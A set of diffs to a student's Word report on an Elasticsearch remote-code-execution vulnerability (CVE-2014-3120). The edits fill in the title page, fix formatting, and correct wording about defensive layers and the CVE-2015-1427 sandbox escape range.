@@ -110,7 +110,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>____________</w:t>
+              <w:t>CVE-2014-3120</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -143,7 +143,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>____________</w:t>
+              <w:t>mahaotian</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -176,7 +176,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>____________</w:t>
+              <w:t>23320311</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -242,7 +242,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                 <w:sz w:val="22"/>
               </w:rPr>
-              <w:t>______ / ______ / 2026</w:t>
+              <w:t>22 / 10 / 2026</w:t>
             </w:r>
           </w:p>
         </w:tc>

</xml_diff>

<commit_message>
docs: drop the unused Group row from the title page
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -177,39 +177,6 @@
                 <w:sz w:val="22"/>
               </w:rPr>
               <w:t>23320311</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4677"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>Group</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4677"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-                <w:sz w:val="22"/>
-              </w:rPr>
-              <w:t>____________</w:t>
             </w:r>
           </w:p>
         </w:tc>

</xml_diff>

<commit_message>
docs: fix the CVE-2015-1427 range, table header and wording issues found in review
</commit_message>
<xml_diff>
--- a/docs/Work1_Report.docx
+++ b/docs/Work1_Report.docx
@@ -239,9 +239,9 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b w:val="0"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Pipeline:   https://github.com/mahaotian23320311/work1-secure-api/actions</w:t>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Pipeline:   https://github.com/mahaotian23320311/work1-secure-api/actions/runs/39714222548</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1353,6 +1353,61 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
+        <w:t xml:space="preserve">The three methods required by the assignment are </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>POST /auth/login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>GET /api/data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (authentication enforced) and the self-chosen </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>POST /api/notes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>; the rest are supporting endpoints.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
         <w:t>Example session:</w:t>
       </w:r>
     </w:p>
@@ -2705,7 +2760,22 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>), which is what the assignment asks to screenshot.</w:t>
+        <w:t xml:space="preserve">) and can be downloaded from the run page under </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Artifacts</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2951,34 +3021,6 @@
                 <w:b/>
               </w:rPr>
             </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4677"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="40" w:before="40"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="4677"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="40" w:before="40"/>
-            </w:pPr>
-            <w:r/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
@@ -2997,10 +3039,15 @@
             <w:pPr>
               <w:spacing w:after="40" w:before="40"/>
             </w:pPr>
-            <w:r/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+                <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
               <w:t>CVE-2014-3120</w:t>
@@ -3357,7 +3404,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> runs a command as the user that started the node — root, in the official image.</w:t>
+        <w:t xml:space="preserve"> runs a command as the user that started the node — root, in this image.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4178,7 +4225,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Why this is effective: layer 1 removes the primitive ("compile what the client sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from the reachable surface. A nuance worth stating in the report: </w:t>
+        <w:t xml:space="preserve">Why this is effective: layer 1 removes the primitive ("compile what the client sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from the reachable surface. One nuance worth keeping in mind: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4193,7 +4240,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> — in 2015 the 1.4.x sandbox was bypassed again (CVE-2015-1427, Groovy sandbox escape) and 1.4.4 is still in that affected range. That is precisely why the design layer is the durable one: "no client-supplied scripts" survives the next clever expression, while a sandbox has to be perfect every time.</w:t>
+        <w:t xml:space="preserve"> — the sandbox introduced in 1.4 was itself bypassed within a year (CVE-2015-1427, Groovy sandbox escape, fixed in 1.4.3). That is precisely why the design layer is the durable one: "no client-supplied scripts" survives the next clever expression, while a sandbox has to be perfect every time.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4516,7 +4563,7 @@
                 <w:b/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>`uid=0(root)`</w:t>
+              <w:t>uid=0(root)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5078,7 +5125,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> as ordinary data, so the check was irrelevant. A capability that lets a client run code is not something a filter can make safe; it has to be removed from the reachable surface, or at minimum switched off by default. The same reasoning explains why the upgrade alone is not the whole answer: 1.4.4 fixed this CVE and still fell to a sandbox escape a year later (CVE-2015-1427), while "no client-supplied scripts" would have prevented both.</w:t>
+        <w:t xml:space="preserve"> as ordinary data, so the check was irrelevant. A capability that lets a client run code is not something a filter can make safe; it has to be removed from the reachable surface, or at minimum switched off by default. The same reasoning explains why the upgrade alone is not the whole answer: 1.4.3–1.4.4 closed this CVE, yet the sandbox they introduced was bypassed again shortly after (CVE-2015-1427), while "no client-supplied scripts" would have prevented both.</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>